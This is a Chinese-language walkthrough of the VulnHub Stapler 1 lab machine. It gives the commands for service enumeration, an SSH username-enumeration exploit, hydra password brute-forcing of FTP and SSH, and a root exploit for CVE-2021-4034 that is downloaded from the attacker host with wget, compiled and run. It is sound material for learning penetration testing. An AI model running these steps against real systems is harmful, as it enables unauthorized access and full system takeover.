一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.4)
靶机:Stapler: 1(10.0.2.13)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/stapler-1,150/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.13
使用nmap端口扫描发现靶机开放端口:21、22、53、80、139、666、3306、12380
nmap -A 10.0.2.13 -p 1-65535
21端口:根据nmap的扫描结果,ftp存在匿名登录。登录ftp,发现存在一个note文件
将该文件下载下来,查看,可以得到两个用户名:elly、john
Elly,请确保更新有效负载信息。完成后,将其留在您的FTP帐户中,John。
22端口:根据nmap扫描结果,22端口安装OpenSSH 7.2p2,该版本存在用户名枚举漏洞
下载exp,枚举用户名
python cve-2018-15473-1.py --port 22 --userList ../../user.txt 10.0.2.14
**80端口:**打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息
使用dirsearch工具进行目录爆破,发现三个文件,但查看这三个文件没有发现什么有用的信息
139端口:使用enum4linux工具枚举SMB服务,发现两个可连接的目录和一些用户名
enum4linux -a -o 10.0.2.13
使用smbclient连接这两个文件夹,并下载里面的文件
smbclient //10.0.2.13/tmp
smbclient //10.0.2.13/kathy
其中todo-list.txt文件里面的内容:I'm making sure to backup anything important for Initech, Kathy
vsftpd.conf文件为ftp的配置文件
666端口:该端口开放未知服务,使用nc连接该端口,发现是一些乱码数据,应该是一些压缩文件或者图片文件
将连接的数据导入a文件,得到一个压缩包文件
将压缩包解压得到一张图片
**3306端口:**开放mysql服务,mysql版本为5.7.12
**12380端口:**打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息
使用dirsearch工具进行目录爆破也没有发现什么文件或目录
三、漏洞利用
暂时没有找到什么突破口,尝试暴力破解
根据提示Elly用户ftp帐户里面可能有有用的信息,使用hydra暴力破解elly用户
在这里插入图片描述
爆破了很长时间,看了一眼其他人的wp,他们是使用命令如下:
hydra -L user.txt -e nsr 10.0.2.13 ftp
// -L:指定用户名字典
// -e:还可再选的选项,n:null,空密码试探 s:使用与用户名一样的密码试探 r:reverse,使用用户名逆转的密码试探
得到用户名密码:elly:ylle
使用得到的用户名密码登录ftp,发现passwd文件
将passwd文件导出
提取出具有命令执行环境的用户,制作成字典
cat passwd | grep -E "/bin/sh|/bin/bash|/bin/zsh"
使用得到的字典爆破ssh,得到用户名密码:SHayslett:SHayslett
hydra -L user1.txt -e nsr 10.0.2.13 ssh -t 64
登录ssh,但不知道为什么直接登录会失败
当我把靶机的网段改为192.168.x.x的时候,又可以登录了
四、提权
后面攻击机的IP变更为:192.168.110.4
靶机的IP变更为:192.168.110.5
使用命令uname -a查看系统的内核版本,为Linux red.initech 4.4.0-21-generic
使用cat /etc/*-release命令查看靶机的发行版本为:Ubuntu 16.04 LTS
使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在/usr/lib/policykit-1/polkit-agent-helper-1,该版本的polkit存在提权漏洞CVE-2021-4034
使用web服务器将exp上传到靶机,编译执行,得到root权限
wget http://192.168.110.4/CVE-2021-4034.c
gcc CVE-2021-4034.c -o CVE-2021-4034
./CVE-2021-4034
获取flag
参考链接:https://blog.csdn.net/weixin_51982615/article/details/123433810
